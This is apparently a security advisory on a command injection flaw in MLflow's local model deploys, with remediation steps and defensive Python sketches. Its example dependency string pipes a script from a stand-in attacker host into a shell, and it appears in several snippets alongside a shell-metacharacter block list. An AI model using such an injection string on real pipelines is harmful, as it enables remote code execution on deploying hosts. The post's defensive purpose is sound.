MLflow patches model artifact command injection in local deploys
TL;DR — When deploying a model with env_manager=LOCAL, MLflow installs dependencies listed in the model artifact; in affected versions, an untrusted or tampered artifact can execute attacker-controlled shell commands on the deploying host.
What happened
MLflow is an open-source platform for managing the ML lifecycle (tracking, packaging, and deploying models). CVE-2025-15379 describes a critical command injection in MLflow’s model serving container initialization path: when deploying a model with env_manager=LOCAL, MLflow reads dependency strings from the model artifact’s python_env.yaml and (in affected versions) interpolates them into a shell command without sanitization.
In practice, this makes the model artifact itself a code-execution vehicle: a malicious or tampered artifact can provide dependency entries that break out of the intended pip install behavior and run arbitrary commands on the system performing the deployment.
This is a high-blast-radius pattern for ML/DevOps environments: “install dependencies from artifacts” is a common pipeline step, and artifact provenance is frequently weaker than source provenance—turning dependency installation into an RCE primitive is exactly the kind of supply-chain adjacent risk platform teams need to treat as production-critical.
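To make the pattern concrete, here is a minimal sketch contrasting the vulnerable shape (string interpolation into a shell command) with a safer argv-based approach. The function names, the SHELL_METACHARS set, and the rejection logic are all illustrative assumptions, not MLflow's actual code path:

```python
import sys

# Hypothetical sketch of the vulnerable pattern (NOT MLflow's actual code):
# interpolating an artifact-supplied dependency string into a shell command
# lets metacharacters escape the intended pip install.
def unsafe_install_command(dep: str) -> str:
    # "numpy; curl attacker.example/x.sh | sh" becomes two shell commands
    return f"pip install {dep}"

# Safer sketch: build an argv list so no shell ever parses the string, and
# reject entries that contain shell metacharacters outright.
SHELL_METACHARS = set(";|&`$><\n")

def safe_install_argv(dep: str) -> list[str]:
    if any(ch in SHELL_METACHARS for ch in dep):
        raise ValueError(f"suspicious dependency entry: {dep!r}")
    # The dependency stays a single argv element even if it contains spaces.
    return [sys.executable, "-m", "pip", "install", "--", dep]

malicious = "numpy==1.26.4; curl https://attacker.example/x.sh | sh"
print(unsafe_install_command(malicious))  # whole string would reach a shell
try:
    safe_install_argv(malicious)
except ValueError as exc:
    print("rejected:", exc)
```

The design point is that an argv list never passes through shell parsing, so metacharacters lose their meaning; rejecting suspicious entries outright adds defense in depth on top of that.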
Who is impacted
- Teams using mlflow in deployments where models are deployed with env_manager=LOCAL and dependencies are installed from model artifacts.
- Environments that accept models from semi-trusted/untrusted sources (shared registries, multi-tenant model catalogs, external contributors, CI-published artifacts).
| Source | Affected versions | Patched / unaffected |
|---|---|---|
| CVE record (huntr CNA via CVEProject) | < 3.8.2 (custom version scheme); description calls out 3.8.0 | 3.8.2 |
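As a rough triage of the version ranges above, the snippet below compares the installed mlflow version against the patched release from the CVE record. It is a stdlib-only sketch: the numeric-prefix comparison is an assumption and deliberately ignores MLflow's custom version scheme, so borderline pre-release strings may need a real version parser:

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED = (3, 8, 2)  # first patched release per the CVE record

def release_tuple(v: str) -> tuple[int, ...]:
    # Compare only the leading numeric release segment; suffixes and
    # pre-release tags in MLflow's custom scheme are deliberately ignored.
    match = re.match(r"[0-9]+(?:\.[0-9]+)*", v)
    if match is None:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(int(part) for part in match.group(0).split("."))

def is_patched(v: str) -> bool:
    return release_tuple(v) >= FIXED

try:
    print("mlflow patched:", is_patched(version("mlflow")))
except PackageNotFoundError:
    print("mlflow is not installed in this environment")
```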
What to do now
- Follow vendor remediation guidance and apply a release that includes the fix.
  - Per the CVE record: "The vulnerability affects versions 3.8.0 and is fixed in version 3.8.2."
- Inventory where mlflow is used to deploy/serve models and identify any pipelines using env_manager=LOCAL (especially automated promotion to staging/prod).
- Treat model artifacts as potentially hostile inputs until you can patch:
  - Restrict who can publish/replace model artifacts in registries used by production deployers.
  - Add provenance controls (signing/attestation) and require verification before deploy.
- If you suspect exposure, review deployment job logs for unexpected dependency strings and rotate credentials accessible to the MLflow deployment environment (cloud tokens, registry creds, data-store keys).
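The log-review step above can be partially automated. The following is a grep-style triage sketch, not a YAML parser: it flags dependency-looking lines in python_env.yaml files that contain shell metacharacters. The flag_suspicious_deps/audit_artifacts names, the metacharacter set, and the artifact-store layout are all assumptions for illustration:

```python
import re
from pathlib import Path

# Characters that should never appear in a legitimate pip requirement string.
SUSPICIOUS = re.compile(r"[;|&`$><]")

def flag_suspicious_deps(yaml_text: str) -> list[str]:
    # Line-based scan: strip list markers and quotes, keep entries that
    # contain shell metacharacters for human review.
    hits = []
    for line in yaml_text.splitlines():
        entry = line.strip().lstrip("- ").strip("\"'")
        if entry and SUSPICIOUS.search(entry):
            hits.append(entry)
    return hits

def audit_artifacts(root: str) -> dict[str, list[str]]:
    # Walk an artifact store and report python_env.yaml files with flagged entries.
    report = {}
    for path in Path(root).rglob("python_env.yaml"):
        hits = flag_suspicious_deps(path.read_text())
        if hits:
            report[str(path)] = hits
    return report

sample = """dependencies:
  - mlflow==3.8.0
  - 'numpy==1.26.4; curl https://attacker.example/x.sh | sh'
"""
print(flag_suspicious_deps(sample))
```

A flagged entry is a strong signal to quarantine the artifact and start the credential-rotation steps above; an empty report is not proof of safety, since this scan only catches crude injection strings.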
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly; send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.
